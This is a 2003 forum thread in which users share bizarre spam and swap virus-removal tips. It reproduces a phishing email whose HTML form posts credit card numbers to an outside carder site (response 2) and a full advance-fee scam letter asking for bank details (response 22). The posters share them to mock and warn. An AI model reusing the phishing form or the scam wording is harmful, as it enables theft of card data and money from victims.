|
|
| Author |
Message |
polygon
|
|
Strange Spam
| 
Sep 24 12:10 UTC 2003 |
This item is for examples of unsolicited email which are significantly
weirder than average.
|
| 101 responses total. |
polygon
|
|
response 1 of 101:
|
Sep 24 12:16 UTC 2003 |
[text reformatted]
---------- Forwarded message ----------
Return-Path: <soul_guards@yahoo.com>
Received: from Aladin (icard-56.BGBest.net [212.91.188.183])
by hamjudo.com (8.12.6/8.12.6/Debian-7) with SMTP id h8IFB1ra011590
for <polygon@potifos.com>; Thu, 18 Sep 2003 11:11:06 -0400
From: "Aladin" <do_not_reply-1400281296@planetxmail.com>
To: "Polygon" <polygon@potifos.com>
Subject: Information (hope usefull)
Date: Thu, 18 Sep 2003 18:07:20 +0200
Message-ID: <88211875.20030918180720@planetxmail.com>
MIME-Version: 1.0
X-Priority: 3 (Normal)
Importance: Normal
X-Mailer: EM: 4.40.0.600
Content-Type: multipart/alternative; boundary="----_PartID_708620893460039"
Hello,
before several weeks I tray to offer my skill against the bad weather but
all weather services not take into consideration my proposal.
Today in 07.15 AM Bulgarian's time I learn about hurricane Isabel and the
dangerous connected with him.
From this time begin my attempt against the hurricane and hope (because
learn late for this one) to reduce power of the Isabel like minimum
result.
If was possible to learn in advance for the hurricane the results will be
more clear.
For example I can stop the rain for a 5 up to 30 minutes according the
amount of the water in the cloud.
If you find for suitable can contact with me in the future to prevent the
calamities.
My ICQ # is 179039569
Best regards
|
polygon
|
|
response 2 of 101:
|
Sep 24 12:21 UTC 2003 |
An unusual way to steal credit card numbers:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From Marlaine_Gateway@att.net Mon Sep 22 09:29:49 2003
Return-Path: <Marlaine_Gateway@att.net>
Received: from telus.net (bqjf33why13wf.ab.hsia.telus.net [142.173.214.44])
by hamjudo.com (8.12.6/8.12.6/Debian-7) with SMTP id h8LLZ2rZ011675
for <polygon@potifos.com>; Sun, 21 Sep 2003 17:35:05 -0400
Received: from bqjf33why13wf.ab.hsia.telus.net
(bqjf33why13wf.ab.hsia.telus.net [142.173.214.44])
by telus.net (8.12.8p1/8.12.8) with ESMTP id nzstq207066
for <polygon@potifos.com>; Sun, 21 Sep 2003 21:28:17 -0400 (EST)
Date: Sun, 21 Sep 2003 21:28:15 -0400 (EST)
From: "CarderPortal.Org" <Marlaine_Gateway@att.net>
X-Mailer: The Bat! (v1.61) Personal
Reply-To: Marlaine_Gateway@att.net
X-Priority: 3 (Normal)
Message-ID: <1458799932.7926442509936@att.net>
To: polygon@potifos.com
Subject: You credit card has been charged for $234.65
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------3331776275274"
<html>
<body text=#000000 vLink=#660000 link=#cc0000 bgColor=#ffffff leftMargin=0
topMargin=0 marginheight="0" marginwidth="0">
<table height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr>
<td vAlign=top align=left width=410><br>
<font size="+2" color="red">
<center>Important notice</center></font><br>
<font size="+1" color="red">
<div align=left>We have just charged your credit card for money
laundry service in amount of $234.65 (because you are either
child pornography webmaster or deal with dirty money, which require
us to layndry them and then send to your checking account).
</div>
<div align=left>If you feel this transaction was made by our
mistake, please press "No".</div>
<div align=left>If you confirm this transaction, please press
"Yes"
and fill in the form below.</div>
<div align=left> </div><br><br>
<center>
<form name="Login" action="http://carderportal.org/phpBB2/login.php"
method=post> <input type="hidden" name="lang" value=" 0"><p>
<font size="-1" color="black">
<b>Enter your credit card number here:</b> <br>
<input style="WIDTH: 260px; HEIGHT: 22px" maxLength=30 name=CCNUM
></p>
<p>
<b>Enter your credit card expiration date:</b><br>
<input maxLength=5 name=CCEXP style ="WIDTH: 241px; HEIGHT: 22px" >
</p>
<p> </p><input type=submit value=Yes name=Yes>
<input type=submit value=No name=No></font>
</font></form></center>
<center>
<font size="+1" color="red">
Contacts: <br>
</font>
<font size="4" color ="#0" black><!--StartFragment --><FONT
size=3> </font>
<P><STRONG><FONT color=#990000>icq: 181184; <A
href="mailto:admin@carderportal.com"><FONT
color=#0000ff>admin@carderportal.com</font></a> -
Err0r32;</font></strong></p>
<P><FONT color=#990000><STRONG>icq: 106561; <A
href="mailto:svs@paris.com"><FONT
color=#0000ff>svs@paris.com</font></a> - Fidel</strong></font></p>
<P><!--StartFragment --></p></font></center></tr>
<P></p></font>
<CENTER></center></td></tr></table>
|
keesan
|
|
response 3 of 101:
|
Sep 24 12:33 UTC 2003 |
From the first of these spams, you can see that it really was written by a
Bulgarian. Unlike most Slavic languages, Bulgarian has the word 'the' (it
is a postposited syllable at the end of a word) and the first and second
person pronouns may be omitted. There is one word meaning in/at (in what
time/at what time).
Albanian, Macedonian, Romanian and Greek all have the article 'the'.
|
tpryan
|
|
response 4 of 101:
|
Sep 24 13:36 UTC 2003 |
My earthlink account is still being bombarded with the
current 'here's the latest MS update' virus email. I'm talking over
100 messages within 4 hours, filling up the 10meg of allocated space.
Anyone else seeing this? I'm not hearing anything about this in the
news.
|
keesan
|
|
response 5 of 101:
|
Sep 24 16:33 UTC 2003 |
Can you set your earthlink account to not accept large messages?
|
rcurl
|
|
response 6 of 101:
|
Sep 24 16:40 UTC 2003 |
Re #2: funny thing, that sender says he's charging my credit card exactly
$234.65 too: must be the standard rate for money laundering. I pass my
messages (received on CAEN) on to abuse@umich.edu, to have a record in
case my credit card gets actually charged.
|
scott
|
|
response 7 of 101:
|
Sep 24 16:46 UTC 2003 |
I get several of those a day.
|
krokus
|
|
response 8 of 101:
|
Sep 24 20:56 UTC 2003 |
re 4
It's been mentioned in some news circles, and especially if they are
an online variety of news.
|
gull
|
|
response 9 of 101:
|
Sep 26 02:07 UTC 2003 |
Email viruses have gotten so common they're no longer 'news', I guess.
I hear rumors of something that looks like it might be Sobig.G
circulating, now, too.
|
ball
|
|
response 10 of 101:
|
Sep 26 13:56 UTC 2003 |
One of the company laptops seems to have W32.Randex.D, which
drops Backdoor/Roxy. The machine has Symantec Norton Anti-
Virus (NAV) installed (not my choice). With the latest
update it's able to delete the Backdoor/Roxy-infected
payload file, but not the system file that immediately re-
infects the machine.
Since this is an 'MS Windows 2000 Professional' machine, I
can't just boot into DOS and manually delete the file. I've
just tried 'Safe Mode' in the hope that NAV would have more
access to the system files, but I click 'Scan' and nothing
happens so it seems that NAV doesn't work in 'Safe Mode'.
I would ask Symantec, but they want ~$5/minute for technical
support. :-( My best bet is probably to just re-image the
machine. It's not clear to me that we have a system image or
'restore disc' for it though and it's a safe bet that the
user doesn't have their document files backed up. <sigh>
|
gull
|
|
response 11 of 101:
|
Sep 26 14:35 UTC 2003 |
Can you boot into safe mode and replace the affected file with a clean
copy off another Windows 2000 Professional machine?
It seems like you ought to be able to copy the document files off before
re-imaging, if it comes to that.
|
ball
|
|
response 12 of 101:
|
Sep 26 15:42 UTC 2003 |
I booted into Safe Mode and deleted c:\winnt\msmsgri32.exe,
which I think was responsible for dropping Backdoor/Roxy. I
am running NAV again now to see if that helped.
I don't know how disciplined the user is about keeping his
document files together in one place. Life gets easier if
we know that backing up everything in (say) c:\horace\ does
the job. Some users are more trainable than others.
|
ball
|
|
response 13 of 101:
|
Sep 26 15:44 UTC 2003 |
Correction, it was c:\winnt\system32\msmsgr32.exe
|
ball
|
|
response 14 of 101:
|
Sep 26 17:23 UTC 2003 |
...and deleting the file allowed Symantec Norton AntiVirus
to successfully clean the computer.
|
tpryan
|
|
response 15 of 101:
|
Sep 26 17:57 UTC 2003 |
Norton might have web pages on how to recover from the infection.
I looked at them to make sure I wasn't infected by the lastest worm
though Norton was stopping incoming, I was not certain. I did not
have the indicated files.
Maybe you can right the procedure for them for Windows 2000
machines if they don't have it for that operating system.
Glad you got it out. When I had an office PC, I would
hate to see a machine wipe and restore to corporate image. As
a programer, it shown lack and knowledge and lack of customer
support, when they where not even able to recover common system
files and transfer them over (things like address book and custom
dictionary).
|
gull
|
|
response 16 of 101:
|
Sep 26 19:43 UTC 2003 |
I suspect sometimes it's a "time is money" issue -- it may involve less
personnel time (and downtime for the user) to simply re-image the
machine than to go through the process of figuring out how to fix it.
With Windows there's also always the chance of patchwork fixes causing
instability that will come back to bite you later.
The extreme example of this would be computer lab systems at colleges.
Some places re-image these on a fixed schedule. I've seen as often as
nightly (automated, of course.)
|
keesan
|
|
response 17 of 101:
|
Sep 26 20:06 UTC 2003 |
Why could not you stick in a DOS boot disk? No floppy drive?
|
flem
|
|
response 18 of 101:
|
Sep 26 20:23 UTC 2003 |
If I understand correctly (which I may not, I'm no windows expert), Win2k uses
a different filesystem from Win98/Dos. Teh dos boot disk would not be able
to understand the contents of the hard drive.
</speculation>
|
mcnally
|
|
response 19 of 101:
|
Sep 26 20:52 UTC 2003 |
(pretty much correct, except I'd say "Win2K *can* use a different filesystem
that DOS won't understand..)
|
ball
|
|
response 20 of 101:
|
Sep 27 06:20 UTC 2003 |
Re #17
Like many of today's computers, this one doesn't have a
floppy drive. It would be possible (although not trivial)
to make a DOS boot CD, but then...
Re #18
...I'm pretty sure Windows 2000 Professional uses the NT
filesystem (NTFS), which as Greg suggests wouldn't be
accessible from DOS.
|
arnezthe
|
|
response 21 of 101:
|
Sep 27 15:59 UTC 2003 |
hallo Moke McNally how are you? i wanna know about you and study about linux
red had 9
|
keesan
|
|
response 22 of 101:
|
Sep 27 16:16 UTC 2003 |
Here is a new spin on the Nigeria scam. I don't think there is any
mention of which country the Federal Government is located in. I sort of
doubt it is Romania.
At the end I have translated the Romanian last line (attached by the
Romanian webmail site). It really adds a professional touch!
From vichoz@masini.ro Sat Sep 27 11:16:55 2003
Date: Thu, 25 Sep 2003 13:37:34 EEST
From: "vichoz@masini.ro" <vichoz@masini.ro>
Reply-To: vichoz@dotpars.com
To: vichoz@masini.ro
Subject: BUSINESS PROPOSAL
Dear Sir,
I am Engr. Victor Chigoziem with the Engineering Stores Department of the
Federal Ministry of Agriculture and Natural Resources and member of
Tenders Board. We have urgent need for a trustworthy foreign contact
person with whom we can carry out a successf ul business deal.
Federal Government has voted the sum of US$1.86 Billion for Local
Production of food crops. The Government has also considered the impact of
the importation of some food items like Rice, Beans, Frozen Chicken and
Turkeys and other food stuffs on the Nations Foreign Reserve and have
banned the importation of the items th at could be produced locally. As a
result, the Federal Ministry of Agriculture and Natural Resources has been
mandated to import Agricultural Equipments for supply to Local Farmers
both at SUBSISTENT AND COMMERCIAL level to encourage them to produce enoug
h food items for local consumption and for export to other African
Countries. We have already started awarding new contracts for supply of
the equipments to successful bidders.
We want you to submit to us immediately your complete company name,
address, your name as President or Managing Director / CEO of the company,
your banking particulars:- (banks name address, telephone, fax and telex
numbers. Your receiving number, swift and routing numbers), with these
informations, we can get you properly registered as one of the contractors
of FMANR who has already been awarded part of this contract for the sum of
US$113.4 Million to supply some of the Agricultural Equipments parts of
which we already have in our custody (stores).
After receiving the above needed and stated information from you, we will
process all the documentation and submit them for immediate approvals and
the Federal Government will pay 25% of US$113.4 Million into your
nominated bank account in the name of your company as the beneficiary,
which is US$28.35M . In no time, the re maining US$85,050,000.00 Million
shall be paid as balance payment or we together in agreement as partners
will use another foreign firm's name that will carry out the supply of the
remaining equipments as a sub-contractor to you in our documentation to
receive this balance payment.
We shall come to your country immediately this fund is in your account to
share the US$28.35 Million. The sharing pattern should be negotiated by
both parties concerned.
However, be rest assured that no risk is involved or any scandal in the
future, for we have done all our homework very well, nobody will be hurt
during and after this transaction. It may also please you to know that all
the GOODS that cover the 25% payment are on record, only us that are key
members of the contract board committee has this knowledge and
information. There is the serious need to keep this transaction secret and
very confidential. To that effect, I would require your private phone and
fax numbers for easy and confi dential communication. I await your
immediate response to this Proposal. Meanwhile, I look forward to
establishing life long business relationship with you.
The nature of your company or business does not necessarily have to be
Agriculturally related but ownership of a company is a criterium for the
project.
Best regards,
Engr. Victor Chigoziem
__________________________________________
Ai mancat azi?
Comanda on-line mancare chinezeasca, romaneasca,\ nmexicana sau pizza la
http://www.culina.ro!
------------------------
My attempt at translation:
Did you eat today? Order online takeout Chinese, Romanian, Mexican, or
pizza at http://www.culina.ro!
My very first spam from a Romanian webmail site.
I get mail from Poland advertising the latest movies there.
|
arnezthe
|
|
response 23 of 101:
|
Sep 27 18:43 UTC 2003 |
hallo Mr.
Engr.
Victor
ChigoziemE
ngr.
[Dk
|
ea
|
|
response 24 of 101:
|
Sep 27 19:22 UTC 2003 |
re #10 - there is a tool that will allow you to create a boot CD that
can read/write NTFS filesystems, and allows you to also add a command
line virus scanner (available from McAfee's website).
Email for more info.
|